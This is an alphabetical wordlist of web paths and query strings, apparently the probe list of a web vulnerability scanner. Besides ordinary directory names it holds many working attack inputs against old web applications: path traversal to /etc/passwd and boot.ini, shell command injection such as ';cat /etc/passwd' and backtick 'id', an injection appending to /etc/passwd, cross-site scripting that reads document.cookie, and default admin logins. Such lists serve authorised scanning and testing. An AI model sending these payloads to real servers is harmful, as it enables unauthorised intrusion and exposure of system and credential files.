store/agora.cgi?cart_id=
store/agora.cgi?cart_id=
store/agora.cgi?page=whatever33.html
store/index.cgi?page=../../../../../../../../etc/passwd
story.pl?next=../../../../../../../../../../etc
story.pl?next=../../../../../../../../../../etc/passwd%00
story/story.pl?next=../../../../../../../../../../etc/passwd%00
story/story.pl?next=../../../../../../../../../../passwd%00
streg.nsf
stronghold-info
stronghold-status
structure.sql
stsrc.nsf
style/
styles/
stylesheet/
stylesheets/
subir/
submit.php?subject=&story=&storyext=&op=Preview
submit?setoption=q&option=allowed_ips&value=255.255.255.255
sun/
sunshop.index.php?action=storenew&username=
super_stats/access_logs
super_stats/error_logs
support/
support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
support/messages
supporter/index.php
supporter/index.php?t=ticketfiles&id=<script></script>
supporter/index.php?t=tickettime&id=<script></script>
supporter/index.php?t=updateticketlog&id=<script></script>
supporter/tupdate.php
surf/scwebusers
survey
survey.cgi
sw000.asp?|-|0|404_Object_Not_Found
swf
sws/admin.html
sws/manager.pl
sys/
syshelp/cscript/showfnc.stm?pkg=
syshelp/cscript/showfncs.stm?pkg=
syshelp/cscript/showfunc.stm?func=
syshelp/stmex.stm?foo=123&bar=
syshelp/stmex.stm?foo=
syslog.htm?%20
system/
sysuser/docmgr/create.stm?path=
sysuser/docmgr/edit.stm?name=
sysuser/docmgr/edit.stm?path=
sysuser/docmgr/ftp.stm?path=
sysuser/docmgr/htaccess.stm?path=
sysuser/docmgr/iecreate.stm?path=
sysuser/docmgr/iecreate.stm?template=../
sysuser/docmgr/ieedit.stm?name=
sysuser/docmgr/ieedit.stm?path=
sysuser/docmgr/ieedit.stm?url=../
sysuser/docmgr/info.stm?name=
sysuser/docmgr/info.stm?path=
sysuser/docmgr/mkdir.stm?path=
sysuser/docmgr/rename.stm?name=
sysuser/docmgr/rename.stm?path=
sysuser/docmgr/search.stm?path=
sysuser/docmgr/search.stm?query=
sysuser/docmgr/sendmail.stm?name=
sysuser/docmgr/sendmail.stm?path=
sysuser/docmgr/template.stm?path=
sysuser/docmgr/update.stm?name=
sysuser/docmgr/update.stm?path=
sysuser/docmgr/vccheckin.stm?name=
sysuser/docmgr/vccheckin.stm?path=
sysuser/docmgr/vccreate.stm?name=
sysuser/docmgr/vccreate.stm?path=
sysuser/docmgr/vchist.stm?name=
sysuser/docmgr/vchist.stm?path=
tablebuild.pl
talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
tar/
tarjetas/
tcb/files/auth/r/root
tcsh
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../etc/passwd
technote/print.cgi
temp/
template/
templates/form_header.php?noticemsg=
temporal/
test
test-cgi.bat
test-cgi.exe?
test-cgi.tcl
test-cgi?/*
test-env
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
test.cgi
test.htm
test.html
test.nsf
test.php
test.php%20
test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
test.txt
test/
test/info.php
test/jsp/Language.jsp
test/jsp/buffer1.jsp
test/jsp/buffer2.jsp
test/jsp/buffer3.jsp
test/jsp/buffer4.jsp
test/jsp/declaration/IntegerOverflow.jsp
test/jsp/extends1.jsp
test/jsp/extends2.jsp
test/jsp/pageAutoFlush.jsp
test/jsp/pageDouble.jsp
test/jsp/pageExtends.jsp
test/jsp/pageImport2.jsp
test/jsp/pageInfo.jsp
test/jsp/pageInvalid.jsp
test/jsp/pageIsErrorPage.jsp
test/jsp/pageIsThreadSafe.jsp
test/jsp/pageSession.jsp
test/phpinfo.php
test/realPath.jsp
test/test.cgi
testcgi.exe
testcgi.exe?
testing/
tests/
texis.exe/?-dump
texis.exe/?-version
texis.exe/junk
texis/junk
texis/phine
texis/websearch/phine
textcounter.pl
thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\">,/system/status/session
theme1/selector?button=status,monitor,session&button_url=/system/status/status\">,/system/status/moniter,/system/status/session
theme1/selector?button=status,monitor,session\">&button_url=/system/status/status,/system/status/moniter,/system/status/session
themes/mambosimple.php?detection=detected&sitename=
ticket.php?id=99999
tidfinder.cgi
tigvote.cgi
tinymsg.php
title.cgi
tmp/
tmp_view.php?file=/etc/passwd
today.nsf
tomcat-docs/index.html
tools/
topic/entete.php
topsitesdir/edit.php
tpgnrock
tpv/
trabajo/
trace.axd
traffic.cgi?cfg=../../../../../../../../etc/passwd
trafficlog/
transito/
tree
tree/
trees/
troops.cgi
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
tsweb/
ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
ttawebtop.cgi/?action=start&pg=../../../../../../../../../../passwd
ttforum/index.php
ttp://127.0.0.1:2301/
tutos/file/file_new.php
tutos/file/file_select.php
tvcs/getservers.exe?action=selects1
typo3/typo3/dev/translations.php
typo3conf/
typo3conf/database.sql
typo3conf/localconf.php
uifc/MultFileUploadHandler.php+
ultraboard.cgi
ultraboard.pl
unlg1.1
unlg1.2
upd/
update.dpgs
updates/
upload.asp
upload.cgi
upload.cgi+
upload.php?type=\"
uploader.php
uploadn.asp
uploadx.asp
uptime
url.jsp
urlcount.cgi?%3CIMG%20
urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
usage/
user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com
user.php?op=userinfo&uname=
user/
useraction.php3
usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)
userinfo.php?uid=1;
userlog.php
userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd
userreg.nsf
users.lst
users.nsf
users.php?mode=profile&uid=<script>alert(document.cookie)</script>
users/
users/scripts/submit.cgi
ustats/
ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc
ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
usuario/
usuarios/
utils/sprc.asp
utils/sprc.asp+
utm/admin
utm/utm_stat
vars.inc+
vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
vc30/
vchat/msg.txt
vfs/
vgn/ac/data
vgn/ac/delete
vgn/ac/edit
vgn/ac/esave
vgn/ac/fsave
vgn/ac/index
vgn/asp/MetaDataUpdate
vgn/asp/previewer
vgn/asp/status
vgn/asp/style
vgn/errors
vgn/jsp/controller
vgn/jsp/errorpage
vgn/jsp/initialize
vgn/jsp/jspstatus
vgn/jsp/jspstatus56
vgn/jsp/metadataupdate
vgn/jsp/previewer
vgn/jsp/style
vgn/legacy/edit
vgn/legacy/save
vgn/license
vgn/login
vgn/login/1,501,,00.html?cookieName=x--\>
vgn/performance/TMT
vgn/performance/TMT/Report
vgn/performance/TMT/Report/XML
vgn/performance/TMT/reset
vgn/ppstats
vgn/previewer
vgn/record/previewer
vgn/style
vgn/stylepreviewer
vgn/vr/Deleting
vgn/vr/Editing
vgn/vr/Saving
vgn/vr/Select
vider.php3
view-source
view-source?view-source
view_item?HTML_FILE=../../../../../../../../../../etc
view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
view_source.jsp
viewcvs.cgi/viewcvs/?cvsroot=
viewcvs.cgi/viewcvs/?cvsroot=
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1
viewlogs.pl
viewpage.php?file=/etc/passwd
viewsource?/etc/passwd
viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
viralator.cgi
virgil.cgi
visadmin.exe
visitor.exe
vote.cgi
vpasswd.cgi
vpuserinfo.nsf
vq/demos/respond.pl?
vq/demos/respond.pl?
w-agora/
w3-msql
w3-sql
w3perl/admin
wa.exe
wais.pl
warez/
way-board.cgi?db=/etc/passwd%00
way-board/way-board.cgi?db=/etc/passwd%00
wbboard/profile.php
wbboard/reply.php
wconsole.dll
web-console/ServerInfo.jsp%00
web.config
web.nsf
web/
web800fo/
webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif
webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif
web_app/WEB-INF/webapp.properties
webaccess.htm
webaccess/access-options.txt
webadmin.nsf
webadmin/
webais
webalizer/
webamil/test.php
webamil/test.php?mode=phpinfo
webapp/admin/_pages/_bc4jadmin/
webbbs.cgi
webbbs.exe
webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
webboard/
webcache/
webcache/webcache.xml
webcalendar/colors.php?color=
webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd
webcalendar/login.php
webcalendar/view_m.php
webcalendar/week.php?eventinfo=
webcalendar/week.php?user=\">
webcart-lite/
webcart-lite/config/import.txt
webcart-lite/orders/import.txt
webcart/
webcart/carts/
webcart/config/
webcart/config/clients.txt
webcart/orders/
webcart/orders/import.txt
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
webchat/register.php?register=yes&username=OverG&email=&email1=
webdata/
webdav/index.html
webdist.cgi?distloc=;cat%20/etc/passwd
webdriver
webfind.exe?keywords=01234567890123456789
webgais
webif.cgi
weblog/
weblogic
weblogs/
webmail/
webmail/blank.html
webmail/horde/test.php
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../..
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
webmail/lib/emailreader_execute_on_each_page.inc.php
webmail/src/read_body.php
webmap.cgi
webmaster_logs/
webnews.pl
webplus.exe?about
webplus?about
webplus?script=../../../../../../../../../../etc
webplus?script=../../../../../../../../../../etc/passwd
websendmail
website/
webspirs.cgi?sp.nextform=../../../../../../../../../../etc
webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
webstats/
webtools/bonsai/cvsblame.cgi?file=
webtools/bonsai/cvslog.cgi?file=*&rev=&root=
webtools/bonsai/cvslog.cgi?file=
webtools/bonsai/cvsquery.cgi?branch=&file=&date=
webtools/bonsai/cvsquery.cgi?module=&branch=&dir=&file=&who=&sortby=Date&hours=2&date=week
webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=&branch=HEAD
webtools/bonsai/showcheckins.cgi?person=
webtop/wdk/
webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef
webtop/wdk/samples/index.jsp
webuser.nsf
webutil.pl
webutils.pl
webwho.pl
welcome.nsf
wguest.exe
whatever.htr
whateverJUNK(4).html
where.pl?sd=ls%20/etc
whois.cgi?action=load&whois=%3Bid
whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
wikihome/action/conflict.php
windmail
windmail.exe
windows/
wksinst.nsf
word/
work/
wrap
wrap.cgi
ws_ftp.ini
wstats/
wusage/
www-sql
www-sql/
www/
wwwadmin.pl
wwwboard.cgi.cgi
wwwboard.pl
wwwboard/passwd.txt
wwwboard/wwwboard.cgi
wwwboard/wwwboard.pl
wwwjoin/
wwwlog/
wwwping/index.stm?wwwsite=
wwwstats.html
wwwstats.pl
wwwstats/
wwwthreads/3tvars.pm
wwwthreads/w3tvars.pm
wwwwais
wx/s.dll?d=/boot.ini
x_stat_admin.php
xdk/
xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS
yabbse/Reminder.php
yabbse/Sources/Packages.php
z_user_show.php?method=showuserlink&class=&rollid=admin&x=3da59a9da8825&
zentrack/index.php
zipfiles/
zml.cgi?file=../../../../../../../../../../etc
zml.cgi?file=../../../../../../../../../../etc/passwd%00
zorum/index.php?method=<script>alert('Vulnerable')</script>
zsh
~/.asp
~/.aspx
~/.aspx?aspxerrorpath=null
~nobody/etc/passwd